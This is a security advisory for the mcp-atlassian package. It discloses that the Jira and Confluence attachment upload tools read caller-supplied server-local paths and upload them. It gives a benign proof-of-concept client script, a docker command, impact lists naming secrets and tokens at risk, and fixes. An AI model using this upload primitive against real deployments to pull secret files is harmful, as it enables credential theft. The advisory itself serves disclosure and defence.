GHSA-f6pj-qv47-g96w: Pip/mcp-atlassian vulnerability
Summary
The Jira and Confluence attachment upload tools accept caller-controlled file path parameters and read those paths from the MCP server's local filesystem before uploading the file as an Atlassian attachment.
In local stdio deployments, this can expose files readable by the user's MCP process. In documented HTTP/SSE or streamable-http deployments, the impact is higher: any MCP client that is allowed to invoke write/upload tools can cause the server process to read a server-local file and upload it to Jira or Confluence.
This is not dependent on an AI prompt injection or model behavior. It can be triggered deterministically with a normal MCP tool call.
Details
The vulnerable behavior exists because upload tool arguments are treated as server-local filesystem paths.
Relevant implementation points:
- mcpatlassian.confluence.attachments.AttachmentsMixin.uploadattachment - Accepts filepath. - Converts the supplied value to an absolute path when needed. - Checks existence with os.path.exists. - Passes the path into the attachment upload flow.
- mcpatlassian.confluence.attachments.AttachmentsMixin.uploadattachmentdirect - Opens the supplied filepath with open(filepath, "rb"). - Sends the resulting file object as multipart form data to Confluence.
- mcpatlassian.confluence.attachments.AttachmentsMixin.uploadattachments - Iterates caller-supplied filepaths. - Calls uploadattachment for each path.
- mcpatlassian.jira.attachments.AttachmentsMixin.uploadattachment - Accepts filepath. - Converts the supplied value to an absolute path when needed. - Checks existence with os.path.exists. - Opens the file and uploads it as a Jira attachment.
- mcpatlassian.jira.attachments.AttachmentsMixin.uploadattachments - Iterates caller-supplied filepaths. - Calls uploadattachment for each path.
- mcpatlassian.servers.jira.updateissue - Accepts an attachments argument as a JSON array string or comma-separated string. - Converts it into attachment paths and passes them into the Jira update flow.
The project also documents non-stdio deployment modes:
- sse - streamable-http - multi-user authentication - Docker and Kubernetes deployment
Therefore the upload path arguments should not be treated as if they always come from a single fully trusted local desktop user. In an HTTP or multi-user deployment, the caller and the server-local filesystem are separate security boundaries.
The core issue is that the MCP caller can choose a path, while the MCP server reads that path using the server process privileges and sends the bytes to a remote Jira or Confluence attachment endpoint.
Expected behavior:
- Server-local file uploads should be denied by default in HTTP/SSE or multi-user deployments, or - Uploads should be constrained to an explicit allowlisted upload directory after realpath resolution, and - Dangerous path forms such as remote UNC paths and file:// URLs should be rejected before filesystem checks.
PoC
The following proof of concept uses a benign temporary file generated at runtime. It does not rely on prompt injection or any AI/LLM behavior. It uses a normal MCP client call against a test Confluence page controlled by the tester.
Prerequisites:
- A test Confluence site. - A test page content ID where the tester is allowed to upload attachments. - A test Confluence API token or another supported authentication method. - Python 3.10 or newer.
Start mcp-atlassian in HTTP mode:
bash docker run --rm -p 9000:9000 \ -e CONFLUENCEURL="https://<your-test-site>.atlassian.net/wiki" \ -e CONFLUENCEUSERNAME="<tester-email>" \ -e CONFLUENCEAPITOKEN="<tester-api-token>" \ ghcr.io/sooperset/mcp-atlassian:latest \ --transport streamable-http --host 0.0.0.0 --port 9000
Install the MCP Python client:
bash python -m pip install "mcp>=1.8.0"
Run this standalone client script:
python import asyncio import os import tempfile from pathlib import Path
from mcp import ClientSession from mcp.client.streamablehttp import streamablehttpclient
async def main() -> None: mcpurl = os.environ.get("MCPURL", "http://127.0.0.1:9000/mcp") contentid = os.environ["CONFLUENCECONTENTID"]
proofdir = Path(tempfile.mkdtemp(prefix="mcp-atlassian-proof-")) prooffile = proofdir / "server-local-proof.txt" prooffile.writetext( "This benign file was read from the MCP server filesystem and uploaded by an MCP tool call.\n", encoding="utf-8", )
async with streamablehttpclient(mcpurl) as (readstream, writestream, ): async with ClientSession(readstream, writestream) as session: await session.initialize() result = await session.calltool( "confluenceuploadattachments", { "contentid": contentid, "filepaths": str(prooffile), "comment": "Security test: benign server-local upload proof", "minoredit": True, }, ) print(result) print(f"Uploaded test filename: {prooffile.name}")
if name == "main": asyncio.run(main())
Run it with the test page ID:
bash CONFLUENCECONTENTID="<test-page-content-id>" python poc.py
Observed result:
1. The MCP client sends a normal confluenceuploadattachments tool call. 2. The MCP server reads the temporary file from its own filesystem. 3. The MCP server uploads that file as an attachment to the configured Confluence page. 4. The uploaded attachment appears on the test page.
Security significance:
- The MCP caller did not need shell access to the server. - The MCP caller did not need direct filesystem access to the server. - The MCP caller only needed permission to invoke the upload tool. - The file read happened with the privileges of the MCP server process.
The same class of issue applies to Jira attachment upload flows that accept caller-controlled file path parameters.
Impact
This is a server-local file disclosure and exfiltration primitive through attachment upload tools.
Impacted users:
- Users running mcp-atlassian with write/upload tools enabled. - Operators exposing mcp-atlassian through sse or streamable-http. - Multi-user deployments where MCP callers are not fully trusted with arbitrary read access to the MCP server filesystem. - Docker or Kubernetes deployments where the MCP process can read environment files, mounted secrets, service account tokens, application configuration, or shared volumes.
Potential attacker:
- A malicious or compromised MCP client with permission to invoke attachment upload tools. - A malicious user in a multi-user MCP deployment. - An attacker who can supply or influence MCP tool arguments through an integrated workflow.
Potentially exposed data depends on the deployment, but can include files readable by the MCP server process, such as:
- application configuration - deployment secrets - cloud or service credentials mounted into the runtime - CI/CD or automation tokens - other files available to the MCP server user
This issue does not require prior compromise of the internal network in deployments where the MCP service is intentionally exposed over HTTP/SSE to multiple users or external MCP clients. The attacker only needs the ability to invoke the upload tool. The server then reads the chosen path with its own process privileges and uploads it to Jira or Confluence.
If the intended security model is that every MCP caller is fully trusted with arbitrary read access to the server filesystem, that should be documented explicitly. Otherwise, server-local file path uploads should be opt-in and constrained to a configured upload root.
Suggested fixes:
- Default-deny server-local path uploads in HTTP/SSE and multi-user deployments. - Add an explicit opt-in flag for server-local upload paths. - Require an allowlisted upload root and enforce it after realpath resolution. - Reject file:// URLs and remote UNC path forms before any filesystem operation. - Prefer client-provided file/resource blobs over server-local path strings for remote MCP deployments.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/mcp-atlassianto a version that resolves this vulnerability.Fixed in 0.22.0 - Configuration
Deny server-local file path uploads by default in HTTP/SSE and streamable-http or multi-user deployments; require an explicit opt-in to enable them.
MCP attachment upload tools server-local path uploads = disabled by default - Configuration
Constrain server-local uploads to an explicitly configured allowlisted upload directory and enforce the restriction after realpath resolution.
MCP attachment upload tools allowlisted upload root = configured directory enforced after realpath resolution - Compensating control
Reject file:// URLs and remote UNC path forms before performing any filesystem operation.
- Compensating control
For remote MCP deployments, prefer client-provided file or resource blobs over server-local path strings.
Event History
Frequently Asked Questions
Which deployments have the greatest exposure?
Documented HTTP/SSE and streamable-http deployments have the higher impact. Any MCP client permitted to invoke write or upload tools can cause the server process to read a server-local file and upload it to Jira or Confluence.
Is an AI prompt injection required to exploit this issue?
No. The behavior can be triggered deterministically through a normal MCP tool call and does not depend on prompt injection or model behavior.
What files could be exposed in a local stdio deployment?
Files readable by the user account running the MCP process may be exposed. The upload tool treats the caller-supplied file path as a local filesystem path before uploading the file as an attachment.
What access does an attacker need?
The attacker needs access to invoke the attachment upload or write tools through an MCP client. In HTTP/SSE or streamable-http deployments, that access can be used to make the server process read a path on its local filesystem.